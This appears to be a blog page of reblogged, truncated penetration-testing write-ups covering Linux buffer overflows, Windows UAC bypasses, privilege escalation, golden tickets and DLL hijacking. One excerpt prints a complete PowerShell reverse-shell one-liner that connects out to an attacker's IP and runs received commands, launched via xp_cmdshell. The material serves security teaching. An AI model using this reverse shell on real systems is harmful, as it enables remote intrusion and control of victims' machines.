Simple ASLR/NX bypass on a Linux 32 bit binary

Decoder's Blog

In this article we will try to bypass the ASLR (Address Space Layout Randomization) and  NX (non execute bit) techniques.

So we got this 32 bit binary “overflow” without source code and root suid bit turned on!

$ ls -al overflow 

-rwsr-sr-x 1 root root 7377 Jun 15 21:17 overflow

All we know is that it requires a string  as an argument,   let’s see if it is vulnerable to buffer overflow.

$ ./overflow $(python -c 'print "A" *1000')
Segmentation fault

Good! We got a buffer overflow.

First of all let’s  examine the binary in order to understand what it really does 😉

Objdump can help us in this case and  this is the output  of “objdump -d overflow” related to the main() function:

0804847d <main>: 804847d: 55 push %ebp 804847e: 89 e5 mov %esp,%ebp 8048480: 83 e4 f0 and $0xfffffff0,%esp 8048483: 83 c4 80 add $0xffffff80,%esp 8048486: 83 7d…

View original post 845 altre parole

What is Command Database

What is command database? It was born as a simple text document with a grep script for store and search more frequently used commands in my CTF/challenge/Boot2Root activity. It is trasformed in a python script, before with txt document as database, after with SQLite. Now it is a complete web application. Is it an innovative … Continua a leggere What is Command Database

UAC Bypass – SDCLT

Penetration Testing Lab

SDCLT is a Microsoft binary that is used in Windows systems (Windows 7 and above) to allow the user to perform backup and restore operations. However it is one of the Microsoft binaries that has been configured to have the autoElevate setting to “true”. This can be verified by using the Sigcheck tool from sysinternals and exploring its manifest file:

sdclt - autoelevate set to true sdclt – autoelevate is set to true

Matt Nelson discovered two methods that can allow  a user to bypass UAC through this binary in Windows 10 environments. Both methods require to construct a specific registry structure however they differ from each other since one method can take command parameters while the other method the full path of a binary that will executed.

App Paths

The backup and restore operation is part of the control panel. This means that when the sdclt.exe process starts the control panel is starting as well…

View original post 353 altre parole

Reverse Engineering Android Applications

Penetration Testing Lab

Mobile application penetration tests go beyond the standard discovery of vulnerabilities through Burp Suite. It is vital to know how to decompile the application for the examination of vulnerabilities into the application code. The purpose of this article is to demonstrate various techniques and tools of how to reverse engineer an android application.

In order to start the reversing process the APK file of the target application is needed. Usually the client is responsible to provide this file to the penetration tester. However if for whatever the reason this is not possible then this article explains various methods of how to retrieve the APK file from Google Play Store and from the actual device.

The APK File

Android Application Package (APK) files are the files which are used by the Android operating system for distribution and installation of mobile applications. Typically an APK file is just a zip file which has been renamed as an…

View original post 490 altre parole

Always Install Elevated

Penetration Testing Lab

Windows environments provide a group policy setting which allows a regular user to install a Microsoft Windows Installer Package (MSI) with system privileges. This can be discovered in environments where a standard user wants to install an application which requires system privileges and the administrator would  like to avoid to give temporary local administrator access to a user.

From the security point of view this can be abused by an attacker in order to escalate his privileges to the box to SYSTEM.

Identification

Lets assume that we have already compromised a host inside the network and we have a Meterpreter session.

get-uid-shell-metasploit Meterpreter Session – Normal user

The easiest method to determine if this issue exist on the host is to query the following registry keys:

registry-queries-always-install-elevated Query the registry to identify the issue

Privilege Escalation with Metasploit

The easiest and the fastest way to escalate privileges is via the Metasploit Framework which contains a module that can generate an…

View original post 210 altre parole

The road to “silver”

Decoder's Blog

Remember my last post, the “SYSTEM” challenge? Now let’s modify the scenario….

Imagine you’ve got the xp_cmdshell running under this account:

os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
[21:52:27] [INFO] theQL query used returns 1 entries
[21:52:27] [INFO] retrieved: dummydomainandrew
command standard output [1]: 
[*] dummydomainandrew

Oh! This MS-SQL server is running under a domain account, nice catch!

First of all let’s move to a stable powershell terminal with our reverse script (the server can connect to the internet on ports 80 and 443)

os-shell>powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<our_public_ip>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

So what are our privileges?

Let’s take a look at the groups we belong to…

PS C:windowssystem32>…

View original post 1.261 altre parole

The “SYSTEM” challenge

Decoder's Blog

This is a brief “writeup” of a challenge which I created for my friends of “SNADO” team.

I will write this article from the “pentester” perspective, just to be more clear and realistic 🙂

The mission was to get windows “SYSTEM” privileges, starting from a vulnerable webapp. There were several ways to get the result, some of them requiring “user interaction”.

Server had only port 80 open for inbound connection.

I will not go too much in details, but the challenge gave me the opportunity to dig deeper in some hidden aspects of windows which I will discuss about.

Let’s start from the beginning. The Web application, hosted on a Win2012 server, was vulnerable to SQLi injection (yes, again!), and after some testing I found the correct parameters for sqlmap:

Not so difficult! There was some type of WAF, easily bypassed with a modified tamper script and, due to serious…

View original post 1.013 altre parole

The “Golden Ticket” solution

Decoder's Blog

This is the second part of my previous post. Remember, you have the domain controller’s  dump of the hashes, but it’s the test lab and when you try to login via PTH (pass the hash), no way.. probably domain admin password was changed…

Game over?

Not at all.. we can try the “Golden Ticket” solution…

What is the Golden Ticket?

Before going ahead , a short recap on Microsoft Kerberos architecture:

kerberos1

In order to access resources on a Windows AD network using the Kerberos protocol, first of all you have to get a TGT ticket that you will use to request tickets for the requested services (TGS). Tickets are delivered by the KDC server service which runs on the domain controllers.

Got it? And here comes  the “Golden Ticket” attack, which permits you to create forged Kerberos Ticket Granting Tickets (TGT) offline to get unauthorized access , impersonating any…

View original post 720 altre parole

Grab the Windows secrets!

Decoder's Blog

This is a severe pen-test!! After gaining access to the internal Windows network, there is no way to go further.  No way to get an AD account, even an unprivileged one,  and you are just banging your head against the wall  😦

But did you an in-depth information gathering? Review your findings… maybe you can find something useful?

So, what is this device (10.1.2.60) with a webserver listening on port 8080?

screenshot-from-2017-02-10-15-36-24Never underestimate low hanging fruits!

Well, this a Network Attached Storage (NAS). We are on the company’s internal network, probably this device is attached via iScsi protocol to the servers or VM hypervisor. Usually in big companies storage is attached via fiber optic SAN but  let’s give it a try!

First of all we have to install the iScsi utilities. If you are working on a Kali box (or just debian/ubuntu flavours) just type

sudo apt install open-iscsi

On…

View original post 849 altre parole

Bypassing UAC from a remote powershell and escalating to “SYSTEM”

Decoder's Blog

This short article is a continuation of my previous one.  I will focus on bypassing UAC and getting SYSTEM privileges, again without any “automated tools”, just to show you how it works and which techniques you could use. As usual, there are several ways to accomplish these tasks, so feel free to add your comments & tips.

Imagine you got reverse powershell during a client side attack. First of all   let’s  see who we are and where we are:

PS C:temp> whoami
srv2012andrea

Are we admin?

PS C:temp> whoami /groups
......
BUILTINAdministrators
......

Good, we are local administrators of the machine.. which is?

PS C:temp> [System.Environment]::OSVersion.Version Major Minor Build Revision ----- ----- ----- -------- 6 3 9600…

Great! A Windows 2012 server, so let’s move and launch our uploaded and  “obfuscated” powerhsell version of mimikatz in order to get the password, hashes, tickets etc….:

PS C:temp> .mimi.ps1 .#####…

View original post 641 altre parole

Dirty tricks with Powershell

Decoder's Blog

You probably already heard about  Powershell and what amazing things you can do with it during a penetration test.

Tools like Powercat, Powershell Empire, Powersploit etc.. are wonderful and ready to use.. but serious hackers have to realize what is going on behind the scenes, do you agree?

So forget these tools and also Rapids’7 Metasploit,  we will try to use a mix of powershell and the traditional “cmd.exe” along with windows command tools  as a replacement of our unmissable “meterpreter” console.

This is the scenario:

You are performing a “Grey Box  Penetration Test”  on web a application hosted on a Windows Server from an internal network.  MS-SQL is the backend database installed on the same machine and finally, after struggling with sqlmap you obtained  your xp_cmdshell.

From now post-exploitation should start but there is no way to upload a meterpreter executable and there is also  an AV solid as rock…

View original post 1.564 altre parole

Idiot’s quick & dirty guide to buffer overflow on GNU/Linux X64 architecture

Decoder's Blog

In this short guide I’ll show you how to exploit a very simple buffer overflow on a linux X64 system and obtain a shell. I won’t tell you about ASM, stacks, registers and so on.. you can find all you need googling around…

Just keep in mind:

  1. The 64-bit registers have names beginning with “R” (on 32 bit they begin with “E”)
  2. There are general purpose and special purpose regsitser
  3. RPB: register which points to base of the current the stack frame
  4. RSP: register which points to the top of the current stack frame
  5. RIP:  register which points to the next processor instruction
  6. on an X64 platform, memory addresses are 64 bit long,  but addresses greater than 0x0000fffffffffff (48 bits) will raise exception in userspace.

register

What does (6) mean? Well we should talk about canonical and non-canonical addresses and so on.. I found this  interesting post somewhere:

“IMHO this is…

View original post 1.492 altre parole

DLL Hijacking

Penetration Testing Lab

In Windows environments when an application or a service is starting it looks for a number of DLL’s in order to function properly. If these DLL’s doesn’t exist or are implemented in an insecure way (DLL’s are called without using a fully qualified path) then it is possible to escalate privileges by forcing the application to load and execute a malicious DLL file.

It should be noted that when an application needs to load a DLL it will go through the following order:

  • The directory from which the application is loaded
  • C:WindowsSystem32
  • C:WindowsSystem
  • C:Windows
  • The current working directory
  • Directories in the system PATH environment variable
  • Directories in the user PATH environment variable

Step 1 – Processes with Missing DLL’s

The first step is to list all the processes on the system and discover these processes which are running as SYSTEM and are missing DLL’s. This can be done just by using the process monitor tool from Sysinternals and by applying the filters…

View original post 567 altre parole

Weak Service Permissions

Penetration Testing Lab

It is very often in Windows environments to discover services that run with SYSTEM privileges and they don’t have the appropriate permissions set by the administrator. This means that either the user has permissions over the service or over the folder of where the binary of the service is stored or even worse both. These services can be found mostly in third party software and can be used as an escalation point from user to administrator.

Manual

The first thing once a meterpreter sessions has been established as a standard user is to determine if there are any services that the user has excessive privileges on them. This can be done with the use of accesschk tool from SysInternals.

Meterpreter - Uploading Accesschk Uploading Accesshk tool on the target

The command below will list all the services that the user “pentestlab” can modify.

Determination of Permissions over a Service Determination of Permissions over a Service

Service All Access means that the user has full control over…

View original post 730 altre parole